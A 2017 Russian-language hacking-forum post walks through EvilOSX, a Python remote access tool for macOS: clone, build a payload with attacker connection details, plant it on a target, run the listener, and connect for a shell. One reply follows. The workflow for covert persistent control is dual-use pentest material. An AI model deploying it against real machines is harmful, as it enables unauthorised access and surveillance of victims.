1. Набираем команду codeby webinar. Набираем команду для организации и проведения вебинаров. Подробнее ...

    Скрыть объявление
  2. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление
  3. Получи 30.000 рублей. Для получения денег необходимо принять участие в конкурсе авторов codeby. С условиями и призами можно ознакомиться на этой странице ...

    Внимание! Регистрация авторов на конкурс закрыта.

    Скрыть объявление

EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 23 май 2017.

  1. Vander

    Vander Well-Known Member
    Администратор

    Репутация:
    7
    Регистрация:
    16 янв 2016
    Сообщения:
    900
    Симпатии:
    1.959
    Привет codeby! Сегодня я хочу вынести на всеобщее обозрение инструмент, который полностью написан на Python, целью которого является RAT -Remote Administration Tool, в переводе — «средство удалённого администрирования» или «средство удалённого управления».

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Особенности:

    · Эмуляция простого экземпляра терминала.

    · Сокеты зашифрованы с помощью CSR через OpenSSL.

    CSR (Certificate Signing Request) или ‘Запрос на Подписание Сертификата’ — это блок закодированного текста, который генерируется на том сервере, на котором будет использоваться сертификат.

    · Нет зависимостей (чистый python).

    · Возможность закрепления в системе.

    · Автоустановка, просто запустите EvilOSX на целевом хосте, а остальное - автоматически.

    Установка:

    > git clone https://github.com/Marten4n6/EvilOSX

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Использование:

    > ./BUILDER EvilOSX.py (вводим необходимые данные для подключения целевого хоста к нам)

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Затем копируем сгенерированный скрипт на целевой хост, в моем случае это OS X Yosemite.

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Следующий шаг – это запуск сервера на атакующем хосте:

    > ./Server.py (Необходимо указать только порт)

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Теперь запустим полезную нагрузку на целевом хосте:

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E
    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E
    Можно проверять состояние сервера на наличие подключенных клиентов:

    > clients

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Коннектимся к нему и получаем shell:

    > clients

    > connect 0

    EvilOSX - Постэксплуатационный RAT для MacOS, OS X.E

    Дальнейшие действия зависят от ваших навыков и фантазии. На этом, пожалуй закончу, спасибо за внимание.
     

    Вложения:

    Rybinez, TrevorReznik, Hackaton192 и 9 другим нравится это.
  2. Rybinez

    Rybinez New Member

    Репутация:
    0
    Регистрация:
    28 ноя 2016
    Сообщения:
    4
    Симпатии:
    1
    пардон за тупой вопрос, но не могу не спросить: в макос питон не предустановлен же?
     

Поделиться этой страницей